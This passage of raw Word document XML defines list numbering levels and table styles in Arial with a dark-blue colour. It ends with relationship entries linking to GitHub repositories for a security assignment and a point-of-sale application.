        <w:ind w:left="2520" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="3240"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="3960"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="4680"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="5400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="6120"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="264" w:hanging="264"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="3240"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="3960"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="4680"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="5400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="6120"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="221" w:hanging="221"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="3240"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="3960"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="4680"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="5400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="6120"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="446" w:hanging="221"/>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140" w:line="313" w:lineRule="auto"/>
        <w:ind w:left="39"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9" w:right="0" w:hanging="1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9" w:before="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="39" w:right="0" w:hanging="1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2.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111.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223.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3.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="Table6">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="99.0" w:type="dxa"/>
        <w:left w:w="110.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="115.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="Table7">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="96.0" w:type="dxa"/>
        <w:left w:w="113.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="109.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="Table8">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="0.0" w:type="dxa"/>
        <w:left w:w="113.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="111.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hyperlink" Target="about:blank" TargetMode="Externa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github.com/Ravindu200232/SSD_Assigment" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Chathura876/pubudu-pos-api" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Chathura876/pubudu-pos-front-e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